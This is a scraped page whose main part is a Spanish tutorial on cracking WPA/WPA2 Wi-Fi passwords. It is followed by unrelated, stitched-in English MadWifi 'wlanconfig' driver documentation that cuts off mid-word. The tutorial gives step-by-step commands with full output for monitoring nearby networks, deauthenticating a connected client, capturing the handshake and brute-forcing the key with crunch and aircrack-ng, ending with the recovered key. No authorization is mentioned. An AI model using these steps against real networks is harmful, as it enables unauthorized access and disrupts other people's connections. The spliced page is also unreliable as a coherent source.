Romper WPA y WPA2 con crunch

Anuncios Google

Virtual call centerwww.vocalcom.es/contact-center - The Best Contact Center Software in the World. Powerful Features !

Hace un tiempo me venan pidiendo armar un tutorial sobre cmo crackear redes con cifrados WPA y WPA2. Entonces decid por realizar este tuto utilizando una herramienta que reemplaza a los diccionarios y en mi caso me di bastante efectividad. Empecemos por dejar en claro un par de cuestiones, la encriptacin WEP como ya sabemos es fcil de romper, se capturan paquetes para luego por ingeniera inversa crackear esos paquetes y conseguir la clave. En el caso de WPA y WPA2 es distinto, el mtodo anterior no puede ser utilizado. Estos tipos de cifrados utilizan algo llamado "handshake" (apretn de manos), es una especie de "saludo" entre el AP (Access Point) y el Cliente. Lo que debemos capturar en este caso justamente es ese handshake para estar en "confianza" con el AP e intentar mediante un diccionario o en este caso con otro mtodo que utilizo yo, romper la clave. Una vez aclarado el funcionamiento, largo el mtodo: Voy a utilizar un software llamado "crunch" Vamos a bajarlo desde ac dijo: DESCARGAR CRUNCH

Una vez que lo descargamos, lo descomprimimos: dijo: tar -xvzf crunch*.tgz

Entramos al directorio dijo: cd crunch

Lo compilamos, por las dudas primero dejo el build-essential por si no lo tienen: dijo: apt-get install build-essential

Ahora si, lo compilamos: dijo: make

dijo: make install

Por ltimo copiamos el comando al sbin: dijo: cp crunch /usr/sbin/

Voy a dar por sentado que tienen instalado aircrack-ng, pero como soy bueno, les dejo el apt-get por las dudas: dijo: apt-get install aircrack-ng

Empezamos !!

Ponemos en modo promiscuo (monitor) nuestra placa (en mi caso la interfaz es aht1, cada cual ponga la suya): dijo: airodump-ng ath1

Me aparecen un par de redes: dijo: CH 6 ][ Elapsed: 4 s ][ 2010-07-11 23:44 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1B:11

3:A9:5D 2 2 0 0 1 54 . WEP WEP dlink-007

00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA 00:21:29:EB:57:85 2 0 0 0 6 54 OPN Nazario_w 00:21:29:96:85:0C 9 3 1 0 6 54e WEP WEP Martin 00:1A:70:3D:3D:81 3 2 0 0 6 54 OPN linksys 00:1C:10:2A:C7:99 5 3 0 0 6 54e OPN Nazario_w 00:18:E7:56:26:89 7 4 0 0 6 54 . WPA TKIP PSK default 00:26:5A:53:E5:84 4 4 0 0 6 54 WEP WEP AR-RED 00:1D:7E:22:25:22 -1 0 3 1 6 -1 OPN <length: 00:18:E7:61:A9:47 8 3 0 0 6 54 . WPA TKIP PSK ESTUDIO J 00:0A:E5:79:83:E8 1 4 1 0 11 11 WEP WEP CIBERA

00:21:29:72

C:32 5 3 0 0 11 54 . WEP WEP linksys

00:0F:A3

1:9C:5B 21 6 0 0 12 54 . WEP WEP LKSA

00:25:9C:69:97:B7 16 12 0 0 11 54e WPA2 TKIP PSK WIPS

00:0F:A3

1:67:8A 6 6 0 0 4 54 . WEP WEP Wi-Fi Arn

1C:AF

7:42:E1:E6 -1 0 0 0 9 -1 <length:

00:15:63:11:69:90 16 10 0 0 9 12e. WEP WEP <length: 00:25:9C:3B:69:28 23 15 0 0 6 54e WEP WEP Apicc 00:40:77:BB:55:03 21 19 0 0 6 54e WPA TKIP PSK dd-wrt 00:21:00:61:B9:12 1 2 0 0 1 54 OPN FT89769

Juro que el ESSID PORINGA no es mo !! Bueno, sigamos, la que voy a utilizar es "default" que tiene cifrado WPA TKIP PSK: TKIP: (Temporal Key Integrity Protocol) PSK: (Pre-Shared Key)

Una vez que tenemos el MAC del AP y el canal, ponemos: dijo: airodump-ng -c NUMERODELCANAL --bssid MAC-DEL-AP -w default ath1

En este caso: dijo: airodump-ng -c 6 --bssid 00:18:E7:56:26:89 -w default ath1

Ahora airodump slo va a escuchar ese canal y ese AP.: dijo: CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:E7:56:26:89 9 90 4152 762 5 6 54 . WPA TKIP PSK defau BSSID STATION PWR Rate Lost Packets Probes 00:18:E7:56:26:89 00:0C:41:7A:77:43 51 11 - 1 42 1102 00:18:E7:56:26:89 00:1F:E1:23:33:40 15 0 - 1 0 61 default

Ac tenemos dos posibles escenarios: 1) Esperar que se conecte un nuevo cliente para adquirir el handshake 2) Desautenticar un cliente ya conectado para que vuelva a conectarse y adquirir el handshake En este caso vamos a utilizar la segunda opcin, anotamos el MAC del AP y el MAC del cliente conectado. AP: 00:18:E7:56:26:89 Cliente Conectado: 00:0C:41:7A:77:43 Procedemos a desautenticar al cliente mediante este comando: dijo: aireplay-ng -0 10 -a MAC-DEL-AP -c MAC-DEL-CLIENTE ath1

En este caso: dijo: aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1

Hace algo as: dijo: [root@debian dke]# aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1 23:46:18 Waiting for beacon frame (BSSID: 00:18:E7:56:26:89) on channel 6 23:46:19 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 1|173 ACKs] 23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [14|155 ACKs] 23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|207 ACKs] 23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [11|173 ACKs] 23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [31|186 ACKs] 23:46:26 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|240 ACKs]

23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [3

186 ACKs]

23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|137 ACKs] 23:46:28 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|147 ACKs] 23:46:32 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [19|258 ACKs]

Si no lo desautentifica a la primera, volver a repetir el comando. Una vez que el usuario es desautenticado y vuelva a ingresar nos va a aparecer arriba a la derecha el handshake dijo: CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ][ WPA handshake: 00:18:E7:56:26:89

Listo, ya tenemos nuestro handshake, ahora utilizamos el crunch:

Escribimos esto: dijo: crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -

En este caso: dijo: crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b 00:18:E7:56:26:89 -w -

Aclaracin: "crunch 8 9" hace referencia a que las claves WPA como mnimo tienen 8 caracteres, en este caso yo quiero que slo pruebe hasta 9 caracteres, y que utilice los nmeros 0123456789. El 75% de los usuarios cometen el error de "securizar" la red con WPA y usar claves numricas, que en este caso vamos a ver lo fciles que son de conseguir con crunch Si quisiramos que crunch use letras, pondramos "crunch 8 15 (mximo 15 caracteres)" abcdefghijklmno" Ahora vamos a ver como crunch empieza a generar claves y a probarlas con el aircrack-ng:

dijo:

[root@debian dke]# crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b 00:18:E7:56:26:89 -w Opening /home/dke/default-01.cap Reading packets, please wait...

Aircrack-ng 1.0 rc3

[00:00:50] 72172 keys tested (1445.33 k/s)

KEY FOUND! [ 00072169 ]

Master Key : F0 BE A1 08 A5 4C D6 E4 08 5C 5F B4 42 4A 69 F0 32 1D C9 11 D5 F3 BB 64 3D F2 31 AB FA F7 A7 1E Transient Key : 72 42 D4 F0 91 91 E9 27 F8 8E D0 DF 1D 48 1B AD 16 10 78 D5 B1 7E 8D 9E 7A 76 68 AC 44 2A 37 94 30 4C 47 F5 FE EB 01 7E 8B 64 87 EF 78 3D 2F 1E E8 6B 4A 2E E4 95 F4 57 4A 32 05 54 66 AA D6 98 EAPOL HMAC : C8 28 B2 83 87 05 18 45 D8 26 C0 42 1D AB A0 7D

Listo, ya tenemos la clave

Un video que captur para los despistados y por las caritas de mierda que aparecen..

Using wlanconfig
The current MadWifi driver supports multiple APs and concurrent AP/Station mode operation on the same device. The devices are restricted to using the same underlying hardware, thus are limited to coexisting on the same channel and using the same physical layer features. Each instance of an AP or station is called a Virtual AP (or VAP). Each VAP can be in either AP mode, station mode, ``special'' station mode, and monitor mode. Every VAP has an associated underlying base device, which is created when the driver is loaded.

Creating and destroying VAPs are done through the wlanconfig tool found in the MadWifi tools directory. Running the wlanconfig utility with no arguments returns a brief help line. The format of the wlanconfig command takes two forms:
wlanconfig VAP create wlandev Base Device wlanmode mode [bssid -bssid]

[nosbeacon]
wlanconfig VAP destroy

Every Linux network device consists of a prefix followed by a number indicating the device number of the network device. For instance, the ethernet devices are named eth0, eth1, eth2, etc. Each VAP which is created is also registered as a Linux network device. The value VAP can be either a prefix name of the Linux network device, or it can be the entire device name. For instance, specifying VAP as ath lets the Linux kernel add the network device as the next device with the prefix ath. Thus, the Linux kernel appends the proper number to the end to form the full device name, e.g., ath1 if ath0 already exists. However, the full device name can also be specified. For instance, VAP can also be ath2. In this case, the network device ath2 is registered, regardless of whether ath1 exists.

The Base Device is the underlying wireless network device name created when the driver is loaded. The MadWifi driver creates wifi0, wifi1, etc. as the underlying devices. By specifying the Base Device, the VAP is created with the Base Device as the parent device. The mode is the operating mode of the VAP. The operating mode of the VAP cannot be changed once it is created. In special cases, the operating mode of the VAP can be different from the operating mode of the underlying parent device. The first VAP which is created sets the operating mode of the underlying device. If the first VAP is deleted and a new VAP is created with a different operating mode than the original VAP, then the operating mode

of the underlying device is changed to the new operating mode. The valid operating modes and their descriptions are given in Table .

Table: wlanconfig Operating Modes Mode Auto Description Auto select operating mode

Managed Station mode for infrastructure networks Master Monitor AP mode Passive monitor (promiscuous) mode

Only one station VAP can exist on a device. If the station VAP is the first VAP created, then no other VAPs are allowed to be created. If the first VAP created is in AP (Master) mode, then one station VAP is allowed to be created. In this case, other AP VAPs can also be created after the station VAP. When AP and station VAPs coexist, the nosbeacon flag must be used when creating the station. This flag disables the use of hardware beacon timers for station mode operation. This is necessary because concurrent AP and station operation implies the station should not modify the TSF clock for the APs. Creating multiple VAPs typically implies that the MAC address of each VAP is different. However, if the -bssid flag is used, then the MAC address of the underlying wireless device is cloned for the VAP being created. To destroy a VAP, the wlanconfig command is used with the destroy parameter. In this case, the full device name must be used, i.e. you must specify the entire name, not just the device prefix.
Example:If we wish to use the system as a station only, we would create a single station VAP once the driver is loaded. The following command creates a single station VAP named ath0 on device wifi0:
myprompt# wlanconfig ath create wlandev wifi0 wlanmode sta

Note that no other VAPs can be created since the we are assuming this is the first VAP created on wifi0. Since this is the first VAP created, we only need to specify ath, not ath0. However, the following command would also be correct:

myprompt# wlanconfig ath0 create wlandev wifi0 wlanmode sta

The MAC address of the station VAP is the same as the underlying device's MAC address since it is the first VAP created. Example:Now, we wish to create two AP VAPs on device wifi0. The first device will have a cloned MAC address taken from the underlying device. The second VAP will have a ``virtual'' MAC address formed from the underlying device's MAC address. The first VAP will be ath0 and the second device will be ath2.
myprompt# wlanconfig ath create wlandev wifi0 wlanmode ap myprompt# wlanconfig ath2 create wlandev wifi0 wlanmode ap

Example:Now, we wish to create two AP VAPs on device wifi0. Both devices will have a the same MAC address cloned from the underlying device. The first VAP will be ath0 and the second VAP will be ath1.
myprompt# wlanconfig ath create wlandev wifi0 wlanmode ap -bssid myprompt# wlanconfig ath create wlandev wifi0 wlanmode ap -bssid

Example:Now, we wish to create two AP VAPs and one station VAP. The AP VAPs will be ath0 and ath2 and the station VAP will be ath1.
myprompt# wlanconfig ath create wlandev wifi0 wlanmode ap myprompt# wlanconfig ath create wlandev wifi0 wlanmode sta nosbeacon myprompt# wlanconfig ath create wlandev wifi0 wlanmode ap

Example:Now, we wish to destroy a VAP (regardless of its operating mode). We assume that there is a VAP named ath0, and it's the one we wish to destroy.
myprompt# wlanconfig ath0 destroy

Next: Private (Driver Specific) Driver Up: Configuring MadWifi using Wireless Previous: retry - Set Retry Contents

root 2005-12-16

Login Settings Impressum/Imprint Wiki Timeline Roadmap Browse Source View Tickets

Open New Ticket Search Start Page Index by Title Index by Date Last Change

Start Deprecated ngFeatures 1. License and HAL 2. New Features 3. WDS, XR, Compression etc.

New MadWifi Code From Atheros

This page is a brief description of the features of the latest code from Atheros.

License and HAL

The license for the driver has not changed. It is still dual BSD / GPL v2 licensed. The About/HAL is still binary only and will still taint the kernel. More information on the About/HAL page.

New Features
Enhanced Chipset Support

The About/HAL that comes along with the new code now supports almost all of chipsets that are currently available. There should be a new HAL soon which supports all of them except for USB chipsets.
VAPs and wlanconfig

The most interesting new feature is probably the introduction of Virtual AP (VAP) mode, which allows the operation of multiple concurrent (virtual) access points, and concurrent running in both AP and station mode. VAPs sit on top of a base device (usually called wifi0). This base device will be the first device you see when the drivers load, and is not linked to the wireless extensions. Beware that ifrename might change the device name from wifi0 to something else if you installed and configured it to rename interfaces with your device's MAC address. The initial kernel messages from ath_pci will still report wifi0, though. To manipulate VAPs, Madwifi comes with a tool called wlanconfig which is used to create and destroy VAPS with various different modes. As of SVN r1407, a sta VAP (Managed

mode interface) is created by default, please see this the Autocreate page for more details about manipulating the autocreation process. A typical wlanconfig command might look like the following (which creates the device ath0 as a normal 'station mode' VAP):
wlanconfig ath0 create wlandev wifi0 wlanmode sta

If the 0 from ath0 were to be ommited, wlanconfig would start creating devices using the first available index. If you obtain an error (wlanconfig: ioctl: Invalid argument) when specifying an index, not specifying an index may work (!). To create an access point, use:
wlanconfig ath0 create wlandev wifi0 wlanmode ap

To create an access point, _and_ a station, use:

wlanconfig ath0 create wlandev wifi0 wlanmode ap wlanconfig ath1 create wlandev wifi0 wlanmode sta nosbeacon

To create APs which share a single MAC address, use the -bssid flag when creating the VAPs:
wlanconfig ath0 create wlandev wifi0 wlanmode ap -bssid wlanconfig ath1 create wlandev wifi0 wlanmode ap -bssid

Finally, to destroy a VAP, issue the command:

wlanconfig ath0 destroy

Note that the whole interface name is needed. Also note that this feature will work with any supported chipset.

WDS, XR, Compression etc.

Madwifi co